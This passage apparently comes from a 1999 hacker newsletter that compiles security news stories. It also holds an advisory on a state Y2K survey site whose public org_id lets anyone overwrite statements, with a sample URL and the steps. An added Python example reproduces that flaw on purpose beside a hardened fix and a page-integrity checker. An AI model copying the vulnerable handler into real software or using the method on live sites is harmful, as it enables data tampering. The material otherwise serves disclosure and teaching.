"Many people using the Web have no understanding that just because you see it, doesn't mean it is true. [Webjacking] is becoming more and more pervasive as people begin to understand how to manipulate the Web. These incidences will rise considerably on both corporate and consumer levels," Baroudi said.
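[Editor's added example, not part of the InfoWorld story and not Inspective Systems' product or code.] The certification-server / validation-server split described above is a content-integrity mechanism, and the same idea also catches the site defacements reported elsewhere in this issue. The sketch below shows it in miniature: a certification step records a keyed fingerprint (HMAC-SHA256) of every page and of the set of link targets on it, a validation step re-checks a page as it is about to be served and reports what no longer matches, and a separate check lists links that point off the site's own hosts, which is the "all of a site's HTML links point to an illegitimate site" case. The manifest layout, function names, key, page bodies and hostnames are all constructed for the example.

```python
"""Content certification and validation in miniature (added example)."""
import hashlib
import hmac
import re
from typing import Dict, Iterable, List
from urllib.parse import urlparse

# Deliberately simple href extractor; a real deployment would use an HTML parser.
HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def fingerprint(key: bytes, data: bytes) -> str:
    """Keyed fingerprint. A plain hash would let an intruder who can edit pages
    also recompute the manifest, so the key lives only on the certification and
    validation servers, never on the web host."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def link_targets(html: str) -> List[str]:
    return sorted(set(HREF_RE.findall(html)))


def certify(key: bytes, pages: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Certification step: one manifest entry per page, with separate
    fingerprints for the full content and for the set of link targets."""
    manifest = {}
    for path, html in pages.items():
        manifest[path] = {
            "page": fingerprint(key, html.encode()),
            "links": fingerprint(key, "\n".join(link_targets(html)).encode()),
        }
    return manifest


def validate(key: bytes, manifest: Dict[str, Dict[str, str]], path: str, html: str) -> List[str]:
    """Validation step, run as a page is loaded. Returns the problems found;
    an empty list means the page is exactly as certified."""
    entry = manifest.get(path)
    if entry is None:
        return ["uncertified page"]
    problems = []
    if not hmac.compare_digest(entry["page"], fingerprint(key, html.encode())):
        problems.append("content changed since certification")
    links_now = fingerprint(key, "\n".join(link_targets(html)).encode())
    if not hmac.compare_digest(entry["links"], links_now):
        problems.append("link targets changed since certification")
    return problems


def foreign_links(html: str, allowed_hosts: Iterable[str]) -> List[str]:
    """Absolute links whose host is not one of the site's own hosts.
    Relative links have no host and are never flagged."""
    allowed = {h.lower() for h in allowed_hosts}
    flagged = []
    for href in HREF_RE.findall(html):
        host = urlparse(href).hostname
        if host and host.lower() not in allowed:
            flagged.append(href)
    return flagged


# Constructed sample site (hostnames and key are placeholders).
SITE_KEY = b"constructed-demo-key-kept-off-the-web-host"
SITE_HOSTS = {"www.example.com", "shop.example.com"}
CERTIFIED_PAGES = {
    "/index.html": '<html><body><a href="/catalog.html">Catalog</a>'
                   '<a href="https://shop.example.com/cart">Cart</a></body></html>',
    "/catalog.html": '<html><body><a href="/index.html">Home</a></body></html>',
}
# A constructed "webjacked" copy of the index page: same look, cart link moved elsewhere.
HIJACKED_INDEX = CERTIFIED_PAGES["/index.html"].replace(
    "https://shop.example.com/cart", "https://shop-examp1e.example.net/cart")

MANIFEST = certify(SITE_KEY, CERTIFIED_PAGES)

if __name__ == "__main__":
    print("genuine:", validate(SITE_KEY, MANIFEST, "/index.html", CERTIFIED_PAGES["/index.html"]))
    print("hijacked:", validate(SITE_KEY, MANIFEST, "/index.html", HIJACKED_INDEX))
    print("off-site links:", foreign_links(HIJACKED_INDEX, SITE_HOSTS))
```

Because the validation server holds the manifest and key rather than the web host, an intruder who replaces a page or rewrites its links cannot also re-certify it; the fingerprint mismatch is what turns a silent defacement or redirect into an alert.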
Still, the practice has become enough of a threat that Federal Trade Commission officials late last month announced that the commission would crack down on Webjackers, saying that it is now looking into its one hundredth related Internet case.

Although most analysts believe that tens of millions of dollars have already been hijacked from legitimate sites, none of them are willing to offer estimated figures on the losses. The problem is that few companies are willing to admit they have been victimized in a fraudulent scheme, either out of embarrassment or in fear of drawing the attention of more hackers.

"There is no way you announce to the world that someone has hacked your site. It's like sending out an invitation to 'Hacker Central' to take another whack at you," said one IT executive at a large East Coast publisher.

Unfortunately, redirecting traffic from a legitimate Web site is easy to do. In many cases, it involves copying a Web site's opening page. Then, with just a few lines of code, hackers can get all of a site's HTML links to point to an illegitimate site. In other cases, it is a matter of adding just a few meta tags to a popular search engine used to find Web sites.

"Essentially, [hackers] are inserting themselves in the middle. They will gladly pose as legitimate. Eventually, they are hoping you will add things to their site's shopping cart," commented Charles Palmer, manager of network security and cryptography at IBM's T.J. Watson Research Center, in Yorktown Heights, N.Y. One result of this could be that hackers can steal credit card numbers from unsuspecting consumers and corporations' buying agents.

An even simpler approach for perpetrators is that for less than $100, they can register the name of popular domains. By just changing an "o'' in a Web site name to a zero, they can set up a fraudulent site. Earlier this year, a would-be hacker registered the domain "Micr0soft,'' but it was discovered before any damage was done.
However, there have been a handful of highly publicized cases. Earlier this year, hackers posted a false financial news story about PairGain, a California-based communications company, making it look as if the story appeared on the Bloomberg financial news service Web site. The bogus story, which said that PairGain was being bought by a well-known telecommunications company, sent PairGain's stock rocketing and then free-falling.

Ed Scannell is an InfoWorld editor at large.

@HWA

07.0 Hacker or Cracker or Neither. Which Word to Use?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Ex Machina

     The Providence Journal takes a stab at trying to define the difference between the words 'hacker' and 'cracker'. Unfortunately they fail miserably. At this point people should just give up and use other words all together. There are enough other words available that can be used instead of confusing people with words which mean different things to different people.

     The Providence Journal
     http://www.projo.com/report/pjb/stories/02732702.htm

10.31.99 00:04:53

BOB KERR
What used to be a bad thing is now a good thing

Just because someone is a hacker doesn't mean he, or she, is a bad person. In fact, some people wear the term with pride. They put it on their business cards.

But a cracker is something else entirely. A cracker is a hacker gone bad. A hacker is a computer ace who uses the computer to make the world a better place. A cracker is a computer ace who uses the computer for evil.

(And just to make this perfectly clear, when speaking of a ``cracker'' we are not referring to a man of the South with a Jesse Helms bumper sticker on his pickup and a slow, easy way of making a point.)

There was a time, maybe a couple of months ago, when ``hacker'' was clearly a bad thing to call somebody. A hacker was cheap, devious, mediocre. But, by some proclamation within the Computer Nation, the hacker is now good, not bad.
It's in all the fan magazines, the ones that have things on their covers like the ``all-new iMac with speeds of up to 400MHz.''

The conversion of the hacker is reminiscent of that undergone by Randy ``Macho Man'' Savage, a villain who became a hero in the World Wrestling Federation. That was in all the fan magazines, too.

Put another way, a hacker is a guy who gets to a firewall and stops. A cracker is a guy who gets to a firewall and figures out a way to go through it.

A firewall? You thought it was something to keep a fire from spreading through a building? Not anymore. It's something to keep a cracker from spreading through a Web site.

What brought all these tortuous twists in terminology to light is a recent case in East Greenwich in which the police reported that they had tracked down a 15-year-old high-school student suspected of using a home computer to go on the Internet and portray a local teacher as a molester of children and animals.

The student allegedly entered an open, unsecured Web site that teachers use to post homework assignments and class notes and refer students to other helpful Web sites. And, in a technological way, the student painted the teacher ugly.

The police found the young techno-trespasser easily. They traced him through an America Online account right to his front door.

And that means this kid has zero status among hackers, and probably crackers, as well. He just didn't have to do enough to get where he wanted to go. And the police didn't have to do enough to catch him.

In the mad, twitchy passions that fuel Internet addictions, there are clearly some showboats. They can go places others can't. And, as surely as soaring kings of playground basketball, they need to make it clear that there is a big difference between their moves and those of a plodding, earthbound kid.
Those who have put in hundreds of long, lonely hours with a computer mouse and a bug-eyed lock on the computer screen might end up a little pale and prone to a nervous blink. But they still want to strut their stuff.

As soon as the story of the East Greenwich Internet abuser became public, hackers responded. They didn't want anyone confusing a four- or five-click after-school romp on the Internet with the simply amazing things they can do with a computer. They clearly resented any implication that the kid was even playing the same game.

``A simple prank which required very little sophistication to carry out'' is what one proud hacker disdainfully called the East Greenwich caper.

The same hacker also provided the information that anyone with a butt-kicking hard drive probably already knew: the hacker is good; the cracker is bad.

It's so difficult to keep pace. You grow up remembering the nasty little brute from down the block who beat your arms black and blue during pickup basketball games. And you thought of him as one thing, and one thing only: a hacker.

Now, who's to know? The Internet has changed everything. The hacker is different from what he used to be. Maybe the hack is, too.

Bob Kerr can be reached by E-mail at bkerr@projo.com.

@HWA

08.0 New Virus Discovered in London
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by nvirB

     The London Sunday Times is reporting that a new virus is spreading throughout London firms and beyond that advances a system clock several months. This causes time sensitive passwords to expire forcing users to reenter them. Somehow the origin of the virus has been traced to Bulgaria, Romania and Scandinavia. While this is a long article there really isn't much technical information supplied; the Times seems to just be spreading Fear and not valuable information. (If anyone has more accurate and verifiable information on this we would like to hear it.)
     The London Sunday Times
     http://www.sunday-times.co.uk/news/pages/sti/99/10/31/stinwenws01032.html?999

October 31 1999
BRITAIN

E-virus turns clocks to 2000

Mark Macaskill

BRITISH companies are being attacked by mystery hackers with a virus that dupes computers into thinking that the millennium has already arrived.

The bug, which forwards internal computer clocks to January 1, 2000, is capable of crippling systems for up to three days, during which time valuable data can be stolen or wiped out.

Security software experts have been called in to combat the threat posed by the virus. They believe it is capable of overpowering almost all computers, including Y2K-compliant systems which have been deemed ready for the rollover to the new millennium.

D K Matai, managing director of mi2g, a security software company which advises many of London's financial institutions, said: "Hackers are causing chaos with this code because it can immediately shut down computer systems. There are not just financial risks to be considered; serious safety issues are also involved."

The virus, known as a clock-forwarding code, has been unleashed on companies in America and Europe. Experts have traced its origin to Bulgaria, Romania and Scandinavia but have been unable to identify the hackers.

The virus is typically disguised as an e-mail or file and can lie undetected in computer systems indefinitely, enabling an individual hacker to attack hundreds of companies simultaneously, a practice known as "flooding". On activation, internal clocks can be forwarded months, fooling computers into thinking that software programmes and passwords, which in reality are valid, have expired.

Last month it was detected in Britain for the first time after a company reported that it was unable to access 40% of its system. It took three hours to resume operations, by which time thousands of pounds' worth of damage had been caused.
During a recent conference on electronic security held by mi2g, it was revealed that Y2K-compliant systems were also under threat. Tests carried out earlier this year on an oil rig and car plant, both classified as millennium-compliant, in which clocks were forwarded to the millennium date, caused up to 40% of computers to fail.

Small to medium-sized companies, which do not have security software to protect their central clocks, are thought to be particularly vulnerable.

@HWA

09.0 Krystalia, In Memoriam
     ~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Netmask

     A well-known hacker, Krystalia, passed away Friday from Cancer. She was a good friend to many people. You may have met her at one of the Defcon Conventions, or just talked to her online. She was a very intelligent and loving girl. She will never be forgotten, and will be missed by many. A tribute site has been set up and they are asking for contributions of kind words, pictures, or writings.

     http://www.krystalia.org/

@HWA

10.0 RealNetworks Changes Privacy Policy Amid Controversy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by AlienPlague, Atropsy, and Hamartia

     It has been learned that RealNetworks' RealJukebox software monitors users and sends the data it collects back to the company. The data collected includes user listener habits, what file types the user plays, and a globally unique identifier (GUID), among other things. RealNetworks never informed anybody of these facts, but claims that this is not an invasion of privacy. (Ummm, yeah.)

     C|Net
     http://news.cnet.com/news/0-1005-200-1425866.html?tag=st.ne.1002.thed.1005-200-1425866

     ZD Net
     http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdhpnews01

     Late Sunday evening, after the above story broke, RealNetworks changed its privacy policy to reflect the new data being collected.
     The voluntary privacy watchdog group Truste has been called on to investigate the matter. Privacy advocates will closely watch Truste's actions since they question if the industry can adequately police itself. (RealJukebox may be free software but we question what you are really paying for it.)

     C|Net
     http://home.cnet.com/category/0-1005-200-1426044.html

Is RealNetworks software keeping tabs on user habits?

By Reuters
Special to CNET News.com
November 1, 1999, 3:55 a.m. PT

NEW YORK--RealNetworks' RealJukebox software monitors users' listening habits and some other activities and reports the information and the user's identity to the company, according to reports.

A security expert intercepted and examined information generated from the program, and company executives acknowledged that RealJukebox gathers information on what users are playing and recording, the New York Times said.

RealJukebox is used to play compact discs on computers and can copy music to a user's hard drive and download music from the Internet.

Dave Richards, RealNetworks' vice president for consumer products, told the Times the company gathered the information to customize service for individual users. He and other company executives said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies, the Times said.

But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored.

Richard Smith, a Brookline, Massachusetts-based independent security consultant, said the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer are sent to the company, the Times said.
In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said.

The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or in the licensing agreement users must approve when installing RealJukebox.

-=-

ZDNet;

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

RealNetworks is watching you

By Reuters
November 1, 1999 4:51 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2385034,00.html?chkpt=zdnntop

NEW YORK -- RealNetworks Inc.'s RealJukebox software monitors user listening habits and other activities and reports the information and the user identity to the company, the New York Times said.

A security expert intercepted and examined information generated from the program, and company officials acknowledged that RealJukebox gathers information on what users are playing and recording, the Times said.

RealJukebox is used to play compact disks on computers and can copy music to a user's hard drive and download music from the Internet.

Violation of privacy?

Dave Richards, RealNetworks' (Nasdaq:RNWK) vice president for consumer products, told the Times that the company gathered the information to customize service for individual users.

Richards and other company officials said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies, the Times said.

But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored.
Richard Smith, a Brookline, Mass.-based independent security consultant, said the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer are sent to the company, the Times said.

In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said.

The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or the licensing agreement users must approve when installing RealJukebox.

CNet;

RealNetworks changes privacy policy under scrutiny

By Courtney Macavinta
Staff Writer, CNET News.com
November 1, 1999, 10:40 a.m. PT

update RealNetworks quietly changed its privacy policy this weekend to disclose a controversial practice of tracking Net music listeners through unique identification numbers assigned to its software.

The practice was reportedly discovered by Richard Smith, a Massachusetts-based independent security consultant, who had examined information generated from RealNetworks' RealJukebox software. The story was first reported in this morning's editions of the New York Times.

The company confirmed today that an identifier existed that could be used to keep tabs on what users are playing and recording. Although many Web sites track users' habits, RealNetworks had not previously disclosed its practices in its privacy policy, which is certified by the Web privacy seal program Truste.

Without explanation this weekend, RealNetworks added a section to its privacy policy stating that users are assigned a "Globally Unique Identifier" (GUID) when they download its RealJukebox software to copy or play digital music via their computers. RealNetworks confirmed that the policy was changed and that it would release details about it later today.
"I don't know when that change took place, but we'll get a response out by noon," RealNetworks chief operating officer Thomas Frank said today. "Any of the information we've been collecting has been designed to make the best experience for the user."

While writing a letter to Truste calling for an investigation of RealNetworks' privacy practices, Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures, discovered that the policy had been changed.

"When I was writing that letter on Sunday night, I found that suddenly the GUID was described in their policy, and that wasn't there on Friday, because I have a copy of the policy that was there on Friday," Catlett said in an interview.

The revised privacy policy makes clear how the GUID is used.

"We may use GUIDs to understand the interests and needs of our users so that we can offer valuable personalized services such as customized RealPlayer channels," the new policy states. "GUIDs also allow us to monitor the growth of the number of users of our products and to predict and plan for future capacity needs for customer support, update servers, and other important customer services."

Privacy advocates warn that user IDs can be used to build profiles on Net users, combining surfing habits with personal information such as the home addresses and credit card numbers gathered by RealNetworks in its licensing agreement with RealJukebox users. The profiles could be used for marketing, but if they are stored by a company they also could be subpoenaed by law enforcement officials during an investigation.

Although the policy discloses the practice, Catlett says that the practice is still invasive and that Truste should reprimand the company.

"It's shameful and unacceptable that they are tracking people like packages without telling them," he said. "I have asked Truste to determine whether this is a breach."
Truste, which licenses out its privacy seals and monitors whether companies are in compliance with their data-collection policies, said today that it will investigate RealNetworks' practices.

"Anytime the privacy statement changes, it's of critical concern for us because we certify that the practices are in line with the policy," said Dave Steer, Truste's communications manager.

"We will look at whether they knew what they were doing, why they were doing it, and [whether] they intentionally left it out of their statement until there was public outcry," he added. "We are really concerned about what is going on, and we're going to look at whether RealNetworks is breaching its contract with Truste."

Another test for self-regulation

How Truste handles the RealNetworks complaint will be closely watched by privacy advocates, who have long contended that industry guidelines are no substitute for stricter consumer-protection laws.

Voluntary programs such as Truste have been lauded by the White House and the Net industry as a key solution for protecting consumers' online privacy, but consumer groups argue that they lack enforcement. If a site fails to comply with its Truste-certified privacy policy, it could have its privacy seal revoked, or in the worst case a complaint could be filed with the Federal Trade Commission.

But as the RealNetworks privacy policy switch also shows, sometimes the policies themselves are not true reflections of a company's online data-collection practices, or they may not be detailed enough.

This is not uncommon, according to a study released in May by Mary Culnan of Georgetown University's McDonough School of Business. Culnan's Georgetown Internet Privacy Policy Survey examined 364 ".com" sites that were randomly selected from the 7,500 most-visited Web sites.
Although 65.7 percent of the sites have privacy policies or give notice that personal information has been securely transmitted, only 9.5 percent of the sites had an "adequate" privacy policy, the study found.

@HWA

11.0 JTF-CND Runs CyberWar Simulation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Punkis

Joint Task Force-Computer Network Defense (JTF-CND) conducted a cyber-war game in early October of this year. The effort was named Zenith Star and was the first such simulation since Eligible Receiver in 1997. Participants in the exercise included representatives from NSA, CIA, FBI, Defense Department and other agencies. The war game included powergrid blackouts, 911 emergency system outages, disrupting crucial Pentagon computer networks and other situations. (This article also regurgitates the story about the SPAWAR printer whose print jobs were redirected to Russia. We would love to have more information on that security hole if anyone has it.)

LA Times
http://www.latimes.com/news/asection/19991031/t000098778.html

U.S. Scurries to Erect Cyber-Defenses
Security: As threat rises, government task force prepares for Internet combat.
By BOB DROGIN, Times Staff Writer

FT. MEADE, Md.--Distant forests dominate the view from the eighth-floor director's suite at the National Security Agency, America's largest intelligence gathering operation. But the talk inside is of a more troubling horizon: cyberspace. "Think of it as a physical domain, like land, sea and air," said Air Force Lt. Gen. Michael V. Hayden in his first interview since taking the NSA's helm in May. "Now think of America conducting operations in that new domain."

These days, many in the U.S. intelligence, law enforcement and national security community are thinking of little else. The Pentagon has stepped up cyber-defense and is planning cyber-combat. The FBI is still struggling to unravel Moonlight Maze, a massive assault on U.S.
government computers that has been traced to Russia. Prodded by the White House, other agencies are also scrambling to protect America's electronic infrastructure from a daily digital barrage from around the world. The stakes could not be higher. Put simply, how can an increasingly wired America best defend itself from hostile nations, foreign spies, terrorists or anyone else armed with a computer, an e-mail virus and the Internet? And how can America fight back in the strange new world of warp-speed warfare? The answers so far are not encouraging. "The pace of technological change is rapidly outstripping our existing technical edge in intelligence that has long been one of the pillars of our national security," said CIA Director George J. Tenet. The United States faces "a growing cyber-threat" from "weapons of mass disruption," Tenet said. "Potential targets are not only government computers but the lifelines that we all take for granted: our power grids and our water and transportation systems." That threat is why 50 experts from the NSA, CIA, FBI, Defense Department and other agencies gathered in early October in a drab office building in Falls Church, Va., for a classified war game that was code named Zenith Star. For two days, they huddled behind closed doors to test America's response to a simulated surprise attack by electronic evildoers--the first such effort since a 1997 exercise found the U.S. government almost defenseless in cyber-war. This time, enemy hackers supposedly had triggered blackouts around major military facilities near Chicago, Honolulu and Tampa, Fla. They paralyzed 911 emergency response systems with a flood of computer-generated calls. Then they started disrupting crucial Pentagon computer networks. The mock scenario was "based on actual vulnerabilities," explained Air Force Maj. Gen. John H. Campbell, who ran Zenith Star as head of the Pentagon's new Joint Task Force-Computer Network Defense in Arlington, Va. 
Although results are not in, Campbell said, he believes coordination and cooperation have improved since Eligible Receiver, the classified 1997 war game that found America unprepared for cyber-attack. In that exercise, a team of NSA hackers proved that they could easily disable power, telephones and oil pipelines across the country, as well as Pentagon war-fighting capabilities. The joint task force was one result. Operational since June, it aims to organize defense of the Pentagon's 2.1 million computers, 10,000 local networks and more than 100 long-distance networks. The unit formally became part of the Pentagon's combat mission on Oct. 1, when it was attached to U.S. Space Command, based in Colorado Springs, Colo. A separate task force will be established next October to safeguard against computer network attack, Campbell said. Now the computer defense force runs a 24-hour operations room that looks like the set of a Hollywood thriller. Inside the Secure Compartmented Information Facility, a dozen experts tend banks of classified and unclassified computers. Red digital clocks on the ceiling show time zones around the world. Three huge screens on one wall monitor major military computer nodes in the United States, Europe and the Pacific. Three other large screens are tuned to TV networks. Campbell, a veteran fighter pilot, sees cyberspace as the wild new yonder. Donning his worn leather flight jacket for an interview in a drafty task force office, he warned that terrorists rely increasingly on computers for planning and communication. "We see more and more terrorist organizations . . . are recruiting computer-smart people and even providing the training for them," Campbell said. Most attacks on U.S. government computers have involved politically motivated vandalism, not terrorism. 
During the Kosovo conflict last spring, for example, the White House and numerous other government departments and agencies were forced to take down Web sites after hackers defaced them with electronic graffiti. But the hackers are more malicious and more powerful than ever. Despite the increased protection, two unknown groups used multiple simultaneous attacks last week to penetrate and deface 13 government and military sites, including the U.S. Army Reserve Command, the White Sands Missile Range, the National Aeronautics and Space Administration's Jet Propulsion Laboratory, the National Defense University and the Naval Coastal Systems Center. To be sure, U.S. officials insisted that no one has stolen military or other national security secrets by penetrating a classified computer system from outside. But it clearly is not for want of trying. Consider the Navy's Space and Naval Warfare Systems Command Center in San Diego, which helps safeguard naval intelligence codes. Its unclassified computer systems, a senior official said, are "under constant attack, more than one a day from outside the country." Spawar, as it is commonly called, has traced hackers this year alone to Argentina, Australia, Brazil, Britain, China, France, Italy, Israel, Japan and Russia. Most use programs to electronically "sweep" the Spawar systems, looking for unguarded access points. "For every protection we put up, they find a way around it," he said. "Many get in, rummage around, package files and send them off. A few gain root access," or complete access to the compromised system. "It's steadily increasing, steadily getting worse." In February, someone even used the Internet to secretly program a new password for a Hewlett-Packard printer at Spawar so that copies would print out in Russia. The intrusion was detected before sensitive files were lost, the official said. 
In that case, as in most, officials never determined whether a curious teenager, a foreign intelligence agency or someone else was responsible for the intrusion. "Often you don't know what you're dealing with until you're pretty far along in an investigation," said Michael A. Vatis, America's top cyber-cop. "You don't know if you have a single intrusion or a concerted attack." Vatis heads the FBI's National Infrastructure Protection Center, the focal point of the federal government's effort to prevent, detect and prosecute cyber-crimes. The center has 800 pending hacker, virus and intrusion cases, up from 200 two years ago. Most involve disgruntled employees who sabotage computer systems for revenge or crooks who use the Internet for scams and fraud. But Vatis said that he worries most about what he calls "America's Achilles' heel," the growing reliance on computer-controlled systems built for efficiency, not security. "We know other countries are building information warfare technology," he said at the headquarters of the infrastructure protection center, a warren of computer cubicles on the 11th floor of the FBI building in Washington. "We know countries are engaged in espionage and economic espionage." The FBI, for example, has tried to determine if cyber-spies at Moscow's prestigious Russian Academy of Sciences are responsible for Moonlight Maze, the most pervasive assault yet on sensitive U.S. Defense Department and other computer networks. The first Moonlight Maze attack was detected in March 1998. Three months later, U.S. security sleuths were able to monitor a series of intrusions as they occurred and traced them back to seven dial-up Internet connections near Moscow. But the intense attacks continued until at least last May, and the FBI investigation remains open. One reason: U.S. officials are unable to determine if the trail really stops in Moscow or simply appears to. Either way, the Moonlight Maze attack was enormous. U.S. 
officials said that the intruders systematically ransacked hundreds of essential but unclassified computer networks used by the Pentagon, the Energy Department, NASA, defense contractors and several universities. Vast amounts of technical defense research were illegally downloaded and transferred to Russia. Investigators found that the hackers used workstations running Sun operating systems and routed high-speed calls through U.S. university network servers to hide their tracks. They usually logged into government computer systems with stolen passwords. Attacking from within, they gained root access to numerous systems. The intruders also sometimes created illegal "back doors" to secretly reenter the compromised systems, the evidence showed. They also installed "sniffers," which let them monitor sensitive communication along U.S. government networks, thus sending Russia e-mail as well as other sensitive information stored in compressed data files. One private-sector target was Meganet Corp., which is based in Tarzana and sells 21 versions of commercial encryption software that it bills as "unbreakable." U.S. export controls prohibit sale of the software overseas, the company says. In two overnight attacks in July 1998, Meganet's Web servers were swamped with "tens of thousands" of hits from "Lab 1313," an unknown group that used an Internet connection from the Russian Academy of Sciences, according to Michael Vaknin, the company's general manager. He said that the attackers sought source code for the encryption software but failed because it is kept on a separate system. Not long ago, few Americans outside the secretive National Security Agency were concerned with the esoteric field of encryption or the theft of digital data. The high-tech NSA, which does the government's code making and code breaking, is responsible for the covert collection of signals intelligence, or "Sigint," from around the world. 
The explosion of new computer and communications technology has given the intelligence agency powerful new tools--but it has also made the agency's job much more difficult. Hayden, the NSA director, conceded, "It was easier to be top dog before."

@HWA

12.0 State Y2K Data Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by CyberDiva

Currently, a state government web site is providing information on that state's computer system preparedness levels. This information is made freely available to the general public. You, as a web surfer, may go and review this information. You can view the status of Public Utilities (gas, water, power), Health Care Providers, the 911 system, Telecommunications, etc. Then, because the site is configured incorrectly, you can change the information to read whatever you like. (Talk about Y2K panic.)

NewsTrolls
http://newstrolls.com/news/dev/guest/110199.htm

UPDATE 12:45PM EST Tuesday, Nov. 2: It appears someone has changed the Y2K survey URLs so they no longer include the org_id; however, the old URLs which include the org_id are still functional and entering the org_id numbers into the Y2K Survey update box will still enable anyone with an id to alter a company's Y2K Survey Data. Unless companies are given new org_ids for their Y2K Surveys and old URLs containing the org_id are rendered inoperable, the security hole is still intact... diva

Note: As of 9AM EST Monday, neither NewsTrolls nor NetworkCommand has heard back from anyone related to the site. We have been trying to contact them since last Friday. For security reasons we are not publishing which US state has the following security hole so that Y2K surveys already entered will not be compromised. Unfortunately, the ability to exploit the hole still exists.

Y2K State Surveys Security Hole
By Mike of NetworkCommand

Overview:
=========
Y2K information subject to exaggeration or gross understatement.
Issue:
======
Because no one is really sure what to expect, be sure to expect the unexpected.

Platform Affected:
==================
Earth.

Summary:
========
Currently, a State Government web site is providing Y2K Preparedness information to the general public. You, as a citizen, may go and review this information. You can view the status of Public Utilities (gas, water, power), Health Care Providers, the 911 system, Telecommunications, etc.

You can read what you might expect:
 -We're almost done.
 -We do not impact essential functions.

You can read what you might not expect:
 2) Do you have, manufacture, or distribute any equipment controlled by computers? NO
 3) If you answered "yes" to the above question, can failure of computer controlled equipment cause untreated sewage to be released to the environment or an interruption of service? YES

So, does this company have any computers? Or, could the failure of those computers they don't have cause the untreated sewage to be released?

Even more, this one from a Natural Gas Company:
 3) What is the date that the Y2K project started? (mm/dd/yyyy) 11/1998
 Contingency Plan Development Start Date (mm/dd/yyyy) 12/1997

Aren't those backwards? Don't you have to start the project before you make a Contingency Plan? Are you guessing? Anyway, as you can see I'm not sure these people can be trusted with paperwork.

Now here's the kicker. These Preparedness statements are available online. If you're a company, you can fill one out. If you're a citizen, you can review them. However, due to an error in the web site's code, if you can find an org_id, you can submit a Preparedness statement. An org_id looks like this:

 view.cgi?org_id=14633927754506433&round=2

And guess what they are using for authentication? You got it, the org_id. Someone who wanted to modify these statements could get the org_id and click the button called "Submit Preparedness Statement." They could then change an existing statement or send in a new one.
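Why the org_id was never a credential, shown as an added example (not code from NetworkCommand, the state site or this zine): a minimal stand-in for the survey's submit handler, first with the flaw the advisory describes (the org_id copied from the public view URL is the only check), then hardened so a write needs a per-organisation token that the public view never exposes, plus a re-key step that makes old tokens and old URLs stop working, which is the fix the UPDATE note above says was missing. The SurveyStore class, the submit_* functions and the query strings are constructed for this example; the org_id value is the one from the advisory's sample URL.

```python
"""Added example (not from the article): a public identifier must not double
as a credential, and a write must be bound to a secret the viewer never sees.
All names and data here are constructed for illustration."""

import hashlib
import hmac
import secrets
from urllib.parse import parse_qs


class SurveyStore:
    """In-memory stand-in for the state site's survey database."""

    def __init__(self):
        self.statements = {}    # org_id -> preparedness statement text
        self.org_secrets = {}   # org_id -> per-org secret behind submit tokens

    # Public read path: anyone may view by org_id, exactly as on the site.
    def view(self, org_id):
        return self.statements.get(org_id)

    # Credential handling: the part the vulnerable site did not have.
    def enroll(self, org_id):
        """Give an organisation a fresh secret and return its submit token."""
        self.org_secrets[org_id] = secrets.token_bytes(32)
        return self.issue_token(org_id)

    def issue_token(self, org_id):
        """Token = HMAC-SHA256(per-org secret, org_id), delivered to the org
        out of band; it never appears in the public view URL."""
        key = self.org_secrets[org_id]
        return hmac.new(key, org_id.encode(), hashlib.sha256).hexdigest()

    def rotate(self, org_id):
        """Re-key an org so every previously issued token (and any old URL
        that carried it) is rejected from now on."""
        return self.enroll(org_id)


def _field(params, name):
    """First value of a query-string field, or None if absent."""
    return params.get(name, [None])[0]


def submit_vulnerable(store, query_string):
    """Mirrors the flaw in the advisory: the org_id from the URL is the only
    'authentication', so anyone who has seen a view URL can overwrite."""
    params = parse_qs(query_string)
    org_id = _field(params, "org_id")
    text = _field(params, "statement")
    if org_id is None or text is None:
        return False
    store.statements[org_id] = text
    return True


def submit_hardened(store, query_string):
    """Same endpoint, but the write requires a token only the org holds.
    The org_id stays public for reading; it just no longer authorises writes."""
    params = parse_qs(query_string)
    org_id = _field(params, "org_id")
    token = _field(params, "token")
    text = _field(params, "statement")
    if org_id is None or token is None or text is None:
        return False
    key = store.org_secrets.get(org_id)
    if key is None:
        return False          # unknown org: nothing to verify against
    expected = hmac.new(key, org_id.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison so a wrong token leaks no timing information
    if not hmac.compare_digest(expected.encode(), token.encode()):
        return False          # wrong, forged, or stale (pre-rotation) token
    store.statements[org_id] = text
    return True


if __name__ == "__main__":
    ORG = "14633927754506433"            # org_id from the advisory's sample URL
    weak = SurveyStore()
    print("vulnerable, org_id only:",
          submit_vulnerable(weak, f"org_id={ORG}&round=2&statement=Not+ours"))
    strong = SurveyStore()
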